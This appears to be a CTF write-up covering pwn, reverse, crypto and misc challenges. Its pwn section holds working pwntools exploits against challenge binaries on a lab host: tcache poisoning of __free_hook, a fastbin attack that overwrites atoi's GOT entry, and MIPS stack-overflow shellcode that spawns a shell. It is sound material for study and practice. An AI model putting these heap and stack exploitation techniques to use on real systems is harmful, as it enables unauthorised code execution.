PWN

kawayi

tcache bin attack

from pwn import *

# Target is x86-64 Linux; log_level='debug' echoes every byte sent and received,
# which is handy for checking that each menu prompt matched as expected.
context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

# Coloured print helpers (orange / red) for highlighting leaked values; unused below.
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

# NOTE(review): `debug = 1` selects the *remote* target, not a local process;
# the flag's name is inverted relative to its meaning.  The address is a
# hard-coded lab host.
debug = 1
if debug:
    r = remote('192.168.17.148', 8888)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    """Attach gdb to the tube `r` (intended for the local `process()` case)."""
    gdb.attach(r)

def add(index, size, content):
    """Menu option 1: allocate `size` bytes in slot `index` and send `content` as its data.

    `index` and `size` are sent as decimal text; `content` is sent raw
    (no trailing newline) after the 'talk?' prompt.
    """
    answers = (
        (b'5.exit', b'1'),
        (b'index?', str(index)),
        (b'size?', str(size)),
    )
    for prompt, reply in answers:
        r.sendlineafter(prompt, reply)
    r.sendafter(b'talk?', content)

def edit(index, content):
    """Menu option 3: overwrite the data of slot `index` with `content` (sent raw)."""
    for prompt, reply in ((b'5.exit', b'3'), (b'index?', str(index))):
        r.sendlineafter(prompt, reply)
    r.sendafter(b'write?', content)

def show(index):
    """Menu option 4: ask the target to print the data of slot `index`."""
    choice, slot = b'4', str(index)
    r.sendlineafter(b'5.exit', choice)
    r.sendlineafter(b'index?', slot)

def delete(index):
    """Menu option 2: free slot `index`."""
    choice, slot = b'2', str(index)
    r.sendlineafter(b'5.exit', choice)
    r.sendlineafter(b'index?', slot)

# Slot 0 is 0x410 bytes, i.e. too large for the tcache, so its free() below
# puts it in the unsorted bin; slot 1 keeps it from merging with the top chunk.
add(0, 0x410, b'a')
add(1, 0x10, b'a')
delete(0)
# The target still prints slot 0 after it was freed (a use-after-free read),
# so the chunk's bin pointers come back in the output.
show(0)

libc = ELF('./x86_64-linux-gnu/libc-2.27.so')
# Keep the 6 low bytes of the printed pointer, zero-extend to 8, subtract the
# fixed offset for this libc build (presumably main_arena+96 — verify with the
# shipped libc) to get the base.
libc_base = u64(r.recvuntil('\n1.')[:-3][-6:].ljust(8, b'\x00')) - 0x3ebca0

# one_gadget offsets for this libc-2.27 build; index 1 is the one used.
one = [0x4f2a5, 0x4f302, 0x4f302]
ogg = one[1] + libc_base
free_hook = libc_base + libc.sym['__free_hook']

delete(1)

# Writing to slot 1 after it was freed is the bug being exercised: it replaces
# the tcache `next` pointer.  glibc 2.27 does not validate that pointer; from
# glibc 2.32 safe-linking mangles it, so a raw overwrite like this one fails.
edit(1, p64(free_hook))
add(2, 0x10, p64(ogg))
add(3, 0x10, p64(ogg))   # served from the forged pointer, i.e. writes over __free_hook

delete(2)   # the first free() after the overwrite goes through the hook

r.interactive()

votestore

fastbin attack：ptr往上0x10位置的变量随着menu中功能被调用的次数递增，递增到合适的数值后，可以绕过fastbin申请堆时的大小验证

from pwn import *

context(arch='amd64', os='linux', log_level='debug') # for 32-bit targets use arch='i386'

file_name = './pwn'

# Coloured print helpers (orange / red); unused below.
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

# NOTE(review): as in the other scripts, `debug` truthy means the *remote*
# target; here it is 0, so the binary is run locally.
debug = 0
if debug:
    r = remote('192.168.17.148', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    """Attach gdb to the tube `r` (intended for the local `process()` case)."""
    gdb.attach(r)

def add():
    """Menu option 1 (add)."""
    menu_prompt = b'choice'
    r.sendlineafter(menu_prompt, b'1')

def edit(name, data):
    """Menu option 2 (edit): send `name` after the 'name' prompt and `data` after 'data', both raw."""
    r.sendlineafter(b'choice', b'2')
    for prompt, payload in ((b'name', name), (b'data', data)):
        r.sendafter(prompt, payload)

def show():
    """Menu option 4 (show)."""
    menu_prompt = b'choice'
    r.sendlineafter(menu_prompt, b'4')

def delete():
    """Menu option 3 (delete)."""
    menu_prompt = b'choice'
    r.sendlineafter(menu_prompt, b'3')

libc = ELF('./2.23-0ubuntu3_amd64/libc-2.23.so')
ptr = 0x6010B0           # NOTE(review): assigned but never used; 0x6010A0 below is ptr - 0x10
atoi_got = elf.got['atoi']

add()
delete()

# Per the write-up: a counter 0x10 above ptr is incremented on every menu call,
# and edit() still writes through the freed entry.  0x3d edits bump the counter
# until it reads as a chunk size that passes the fastbin size check in malloc.
for i in range(0x3d):
    edit('a','a')

# Point the freed chunk's fd at ptr - 0x10, where that counter acts as the fake size field.
edit(p64(0x06010A0), 'a')

add()
add()                     # second add returns the fake chunk overlapping ptr
edit(p64(atoi_got), 'a')  # ptr now holds the address of atoi@GOT

# Reading through ptr prints the GOT entry: 6 bytes of the resolved atoi address.
show()
r.recvuntil('name:')
libc_base = u64(r.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']

# one_gadget offset for this libc-2.23 build.  The GOT write below is only
# possible because the binary is not built with full RELRO; -Wl,-z,relro,-z,now
# would leave atoi@GOT read-only at this point.
ogg = libc_base + 0xf0897
edit(p64(ogg), p64(ogg))

# Presumably the menu parses this choice with atoi(), which now runs the gadget.
r.sendline('5')

r.interactive()

babymips

from pwn import *

# Big-endian MIPS target; this also selects the assembler used by asm() below.
context(arch='mips', os='linux', endian='big', log_level='debug')

file_name = './pwn'

# Coloured print helpers (orange / red); unused below.
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

# NOTE(review): `debug = 1` again means the remote lab host; the local case
# runs the binary under user-mode qemu.
debug = 1
if debug:
    r = remote('192.168.17.148', 7777)
else:
    r = process(['./qemu-mips-static', file_name])

elf = ELF(file_name)

def dbg():
    """Attach gdb to the tube `r` (intended for the local `process()` case)."""
    gdb.attach(r)

shellcode_addr = 0x7ffff590   # NOTE(review): unused below; presumably a stack address observed under qemu

# pwntools' canned MIPS shell stub, assembled big-endian per the context above.
shellcode = shellcraft.mips.linux.sh()
shellcode = asm(shellcode)

# Single stack-overflow payload: 0xc bytes of filler, 0x41CE10, 0x20 filler,
# 0x4202F4, two zero words, 0x426034, 0x64 filler, then the shellcode.  The
# three addresses are binary-specific (presumably saved-register / return
# targets in the static binary — confirm in a disassembler).  Running data
# off the stack like this only works because the stack is executable; NX and
# a stack canary would each stop it.
p = b'a' * 0xc + p32(0x41CE10) + b'a' * 0x20 + p32(0x4202F4) + p32(0) * 2 + p32(0x426034) + b'a' * 0x64 + shellcode
r.sendline(p)

r.interactive()

REVERSE

LoginToMe

动态调试拿到seed，然后用z3简单爆破

from z3 import *
import libnum

# Recover the five 32-bit words the login check compares against.  The low
# byte of word 0 is enumerated over printable ASCII; for each candidate z3
# solves the checker's remaining arithmetic constraints, and every satisfiable
# solution is printed as text (each word byte-reversed, i.e. little-endian).
for low_byte in range(33, 128):
    solver = Solver()
    words = [BitVec('%d' % k, 32) for k in range(5)]
    lo = [word & 0xffff for word in words]   # low 16 bits of each word
    hi = [word >> 16 for word in words]      # high 16 bits (z3's `>>` on BitVec is an arithmetic shift)
    constraints = [
        words[0] & 0xff == low_byte,
        lo[0] * hi[0] == 0x146E4C25,
        lo[0] + hi[0] == 0x9A66,
        words[1] - words[2] == 0x3BF1F3FD,
        lo[1] + hi[1] == 56269,
        lo[2] - hi[2] == 15092,
        (lo[1] & 0xff) * (lo[2] & 0xff) == 10710,
        (hi[1] & 0xff) * (hi[2] & 0xff) == 12051,
        (hi[1] >> 8) + (hi[2] >> 8) == 172,
        lo[3] * hi[3] == 171593250,
        lo[3] + hi[3] == 26219,
        lo[4] * hi[4] == 376306868,
        lo[4] + hi[4] == 40341,
    ]
    solver.add(*constraints)
    if solver.check() != sat:
        continue
    model = solver.model()
    solution = [model[word].as_long() for word in words]
    for value in solution:
        print(libnum.n2s(value)[::-1].decode(), end="")
    if solution != []:
        print()

CRYPTO

你真的了解RSA吗

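#step1
# Textbook RSA decryption with both primes known.  Only builtins are used:
# pow(e, -1, phi) (Python 3.8+) replaces gmpy2.invert and int.to_bytes replaces
# Crypto's long_to_bytes, so the snippet runs without third-party packages.
# (Difference to note: long_to_bytes(0) is b'\x00', to_bytes gives b''.)
p = 3570689330324393
q = 8539449885098290729
c = 11499128260801730440456056246212361
e = 17
n = p * q
fn = (p - 1) * (q - 1)          # Euler's totient phi(n) for two distinct primes
d = pow(e, -1, fn)              # raises ValueError if gcd(e, phi) != 1
m = pow(c, d, n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))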
b'flag{p*q*r*s_'

step2部分：直接用 http://www.factordb.com/ 分解 int(n)

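# Multi-prime RSA with all four factors known (they were looked up on factordb).
# Note how close the four factors are to each other — within ~150 — which is
# why n factored trivially; a sound key generator picks independent primes.
# Builtins replace the third-party calls: pow(e, -1, phi) for invert() and
# int.to_bytes for long_to_bytes, and the `from ... import *` lines are gone
# (they shadowed names at module level).
p = 1235542029039790988583258906019
q = 1235542029039790988583258906103
s = 1235542029039790988583258906107
r = 1235542029039790988583258906163
e = 0x10001                      # was `e=e=0x10001`, a redundant chained assignment
c = 0x8a20cca012e973b2a8ca161bd1e82804714cc75bd1238f8579cc7a5143c8bb955320b8c2811dc98a4547e9f4fe856e039630
n = p * q * s * r
# phi(n) for distinct primes is the product of (prime - 1) over all factors.
phi_n = (p - 1) * (q - 1) * (r - 1) * (s - 1)
d = pow(e, -1, phi_n)            # raises ValueError if gcd(e, phi) != 1
m = pow(c, d, n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))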
b'32cacb2f994f6b42183a1300d9a3e8d6'

Problem

将b.txt文件放到运行sage的系统上，并命名为lxz.txt

#sage
import numpy as np

def gravity(n, d=0.25):
    """Return the n x n matrix A[i, j] = d/n * (d**2 + ((i - j)/n)**2) ** (-1.5).

    Vectorised form of the original double loop: the (i - j) term for every
    pair of indices is the outer difference of one index vector.
    """
    idx = np.arange(n)
    diff = (idx[:, None] - idx[None, :]) / n
    return d / n * (d ** 2 + diff ** 2) ** (-1.5)

# One float per line; the file is the challenge's b vector, saved as lxz.txt
# (hard-coded absolute path — adjust for your machine).
b = []
with open("/home/die/lxz/lxz.txt","rb") as f:
    for line in f.readlines():
        b.append(float(line.strip().decode()))
n = 85
# Sage: `^` is exponentiation, so this is 10**20.  In plain Python `^` is XOR
# and the same line would give 30, so this file must be run under Sage.
kkk= 10 ^ 20
A = gravity(n)

# Scale everything to integers so the lattice can be built over ZZ.
A = [[int(j * kkk) for j in i] for i in A]
b = [int(i * (-1) * kkk) for i in b]
# Rows: [A_i | 0] for each row of A, then [-b | 1].  The first LLL-reduced row
# is taken as the short vector that expresses b as a combination of the rows.
M = [A[i] + [0] for i in range(n)]
M.append(b + [1])
M = Matrix(ZZ, n + 1, n + 1, M)
zz= M.LLL()[0]
print(zz)
# Solve x * M == zz for x; its entries are printed as bytes.
flag = M.solve_left(zz)
print(bytes(flag))

MISC

cloacked

将文件头补成.zip的格式，解压得到文件，转成图片，用cloacked-pixel解密后改后缀为zip，打开得到flag：Flag{just_a_demo_flag}